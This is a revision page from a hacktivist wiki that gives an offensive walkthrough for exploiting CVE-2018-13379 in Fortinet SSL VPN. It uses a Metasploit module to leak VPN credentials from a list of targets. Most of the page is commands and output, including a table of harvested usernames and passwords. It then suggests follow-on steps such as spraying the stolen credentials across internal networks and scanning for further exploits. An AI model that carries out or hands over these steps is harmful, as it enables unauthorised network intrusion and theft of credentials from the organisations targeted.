Fortinet SSL VPN Path Traversal: Difference between revisions

From Enlace Hacktivista
Jump to navigation Jump to search
mNo edit summary
mNo edit summary
 
(2 intermediate revisions by the same user not shown)
Line 5: Line 5:
* Scan the LAN for vulnerabilities which we can exploit to gain further access into the network
* Scan the LAN for vulnerabilities which we can exploit to gain further access into the network


To exploit CVE-2018-13379 we'll use metasploit has it formats the credentials nicely for us.
To exploit CVE-2018-13379 we'll use metasploit as it formats the credentials nicely for us.
 
Start the database and run it:
Start the database and run it:
* sudo systemctl start postgresql
* sudo systemctl start postgresql
Line 15: Line 16:
StArting the Metasploit Framework console...
StArting the Metasploit Framework console...
</pre>
</pre>
Search for and use the module for CVE-2018-13379:
Use module:
<pre>
msf6 > search CVE-2018-13379
 
Matching Modules
================
 
  #  Name                                                  Disclosure Date  Rank    Check  Description
  -  ----                                                  ---------------  ----    -----  -----------
  0  auxiliary/gather/fortios_vpnssl_traversal_creds_leak                  normal  No    FortiOS Path Traversal Credential Gatherer
 
 
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/fortios_vpnssl_traversal_creds_leak
</pre>
<pre>
<pre>
msf6 > use 0
msf6 > use auxiliary/gather/fortios_vpnssl_traversal_creds_leak
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) >
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) >
</pre>
</pre>

Latest revision as of 10:23, 5 July 2023

Exploiting CVE-2018-13379 Forti SSL VPN

Exploiting CVE-2018-13379 allows us to gain credentials to the targets VPN. When exploiting CVE-2018-13379 there are a few main ways to gain further access than just the Forti VPN console:

  • Look for Bookmarks in the VPN console which have internal address and credentials already saved
  • Connect to the Forti VPN client locally (Windows server via RDP) and scan the LAN for systems and then spray the VPN credentials as explained here
  • Scan the LAN for vulnerabilities which we can exploit to gain further access into the network

To exploit CVE-2018-13379 we'll use metasploit as it formats the credentials nicely for us.

Start the database and run it:

  • sudo systemctl start postgresql
  • msfdb init

Start msfconsole: 

user@host:~$ msfconsole
StArting the Metasploit Framework console...

Use module: 

msf6 > use auxiliary/gather/fortios_vpnssl_traversal_creds_leak
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) >

Set your targets: 

msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > set RHOSTS file:targets.txt
RHOSTS => file:targets.txt

Run the exploit module! 

msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > run

[*] https://10.10.10.11:10443 - Trying to connect.
[+] https://10.10.10.11:10443 - Vulnerable!

View the credentials: 

msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > creds
Credentials
===========

host           origin         service            public       private         realm  private_type  JtR Format
----           ------         -------            ------       -------         -----  ------------  ----------
10.10.10.11    10.10.10.11    10443/tcp (https)  admin        8401327                Password      
10.10.10.12    10.10.10.12    10443/tcp (https)  cvilleneuve  3264012                Password      
10.10.10.13    10.10.10.13    10443/tcp (https)  vdujardin    Jouv2018$              Password      
10.10.10.14    10.10.10.14    10443/tcp (https)  montechti    Thomas2005             Password      
10.10.10.15    10.10.10.15    10443/tcp (https)  hvac         Winter2022             Password
Retrieved from "https://enlacehacktivista.org/index.php?title=Fortinet_SSL_VPN_Path_Traversal&oldid=1094"